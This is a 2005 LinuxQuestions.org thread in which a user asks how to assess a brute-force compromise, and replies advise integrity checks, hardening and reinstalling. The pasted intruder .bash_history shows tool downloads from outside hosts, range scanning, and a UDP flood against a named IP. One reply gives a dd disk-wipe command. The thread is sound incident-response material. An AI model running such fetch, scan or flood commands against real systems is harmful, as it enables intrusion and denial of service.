LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (http://www.linuxquestions.org/questions/linux-security-4/)
-   -   Brute-force attack - How can I assess the damage? (http://www.linuxquestions.org/questions/linux-security-4/brute-force-attack-how-can-i-assess-the-damage-367502/)

thew00t 09-27-2005 10:43 AM

Brute-force attack - How can I assess the damage?
 
This morning I came in to work to find my FC3 box being brute force attacked. I ran top when I noticed some major lag in performance and found about 50 processes by the name of "brute." I killed all of them and ran a "who" command, which told me someone had logged in using the account "test" on pts9. Killed the terminal's process and checked out /home/test. ls -al didn't reveal much more than
Code:

total 48
drwx------  4 test test 4096 Sep 25 14:51 .
drwxr-xr-x  5 root root 4096 Sep 19 18:48 ..
-rw-------  1 test test 1137 Sep 27 10:30 .bash_history
-rw-r--r--  1 test test  24 Sep 16 10:35 .bash_logout
-rw-r--r--  1 test test  191 Sep 16 10:35 .bash_profile
-rw-r--r--  1 test test  124 Sep 16 10:35 .bashrc
-rw-r--r--  1 test test  383 Sep 16 10:35 .emacs
-rw-r--r--  1 test test  120 Sep 16 10:35 .gtkrc
drwxr-xr-x  3 test test 4096 Sep 16 10:35 .kde
drwxr-xr-x  2 test test 4096 Sep 16 10:35 .xemacs
-rw-r--r--  1 test test  658 Sep 16 10:35 .zshrc

It says total 48 but thats obviously not 48 files. I checked the contents of .bash_history (way to not cover the trail!) and got this:
Code:

[root@dwong5 test]# cat .bash_history
uname -a
uptime
users
passwd
wget
ls
ls -a
cd /var/tmp
ls
ls -a
/sbin/ifconfig | grep inet
ls
who
wget caracal.idilis.ro/psyLINUX.tar.gz
tar zxvf psyLINUX.tar.gz
rm -rf psyLINUX.tar.gz
cd psybnc/
./psyport 6669
ps aux
./psybnc
cd ..
wget caracal.idilis.ro/scan.tgz
tar zxvf scan.tgz
rm -rf scan.tgz
cd scan/
chmod +w vuln.txt
ls
./start
./start 211.234
./start 66.52
uptime
cd ..
ls
uname -a
exit
ls -a
cd /var/tmp/scan/
ls
cat vuln.txt
ps aux
./start 213.236
uptime
cd /var/tmp
ls
cd scan/
;s
ls
chmod +x vuln.txt
cat vuln.txt
./start 152.252
./start 193.215
./start 70.98
./start 172.148
./start 172.14
ps aux
./start 198.32
./start 4.38
cat vuln.txt
cat /etc/issue
cat /proc/cpuinfo
ls
ps aux
ls
./start 171.152
./start 217.254
./start 69.21
./start 69.201
./start 217.206
./start 132.249
cd /var/tmp
ls
cd scan/
./start 213.236
cat vuln.txt
./start 217.239
cd ..
ls
wget
wget www.moused.as.ro/udp.pl
chmod +x udp.pl
ls
./udp.pl 69.16.192.39 22 0
ps aux
rm -rf udp.pl
cd scan/
killall -9 brute
ps aux
./start 69.39
ps aux
cat vuln.txt
./start 65.104
uname -a
cd /var/tmp/scan/
ls
cat vuln.txt
uptime
who
ps aux
exit

What I would like to know:
1) Is there any way to find the extent of the damage, if any?
2) How can I prevent this again?

Thanks!

unSpawn 09-27-2005 11:21 AM

1) Is there any way to find the extent of the damage, if any?
Local integrity check using Aide or Samhain or alike. If you're haven't got any of those, using a package manager with verification option: at least to some extent the possibility of checking binaries and config files. Otherwise: none but diffing against backups, practically speaking.


2) How can I prevent this again?
Only allow what you know is needed in terms of (LAN or publicly accessable) (secure or chrooted) networked services, user accounts and please have a look at the LQ security refs: http://www.linuxquestions.org/questi...threadid=45261 for hardening the box. One example: if you where running a kernel with Grsecurity patches, she wouldn't even be *able* to open an outbound socket unless you specifically allowed that account to have that privilege.

TigerOC 09-27-2005 03:21 PM

I found this quite ironic really. Amongst the trail, is the link - http://www.moused.as.ro/udp.pl and the perl script and then when you go the index page it is all about securing your server. Just had to smile - sorry. I feel for you but what possessed you to have a user named test with these permissions? Really an accident waiting to happen.
if you download and have a look at the file scan.tgz he was using your system to scan other systems in the ip ranges of the various scripts contained in the package along with all the possible names of users and passwords. A very interesting insight into the mind of a cracker and what they can do.
Your answer is really recover any data and then if=/dev/zero of=/dev/hdx bs=1M and re-install.

thew00t 09-27-2005 04:11 PM

Thanks for the replies. I know the "test" user looks quite like a rookie admin mistake, and probably is, but I have no recall of ever setting up a user like that, nor would I with such a pressumably weak password. This makes me wonder how the account came in to creation. Well, it looks as though nothing was compromised. Diff'ing against backups isn't much of an option as I don't keep regular backups of my work machine though I probably should. And yeah, I'm gonna stay clear of the dd'ing my hard disk to zero for the moment :D

unSpawn 09-27-2005 07:08 PM

looks quite like a rookie admin mistake, and probably is, but I have no recall of ever setting up a user like that, nor would I with such a pressumably weak password. This makes me wonder how the account came in to creation.
One of the reasons root account users should keep a logfile, appropriately harden boxen and regularly inspected them for changes (Get Aide or Samhain plus Tiger or LSAT plus Chkrootkit and/or Rkhunter). OTOH there still is SW that installs crappy default login:pass combo's, an audit would have caught that. Tiger for instance can inspect the password files and run JTR, and Rkhunter does inspect the password files as well.


Well, it looks as though nothing was compromised.
Meaning you decided the actual state of the box using what? Without proper means of determining that's worth close to nothing.


And yeah, I'm gonna stay clear of the dd'ing my hard disk to zero for the moment
In any case compromised boxen shouldn't stay connected to the 'net until you find the cause or wiped it clear and reinstalled the whole setup (TigerOC is right about that) as it does not only affect your situation but possibly others as well if a compromised box is being allowed to be used as intermediate.


All times are GMT -5. The time now is 10:34 AM.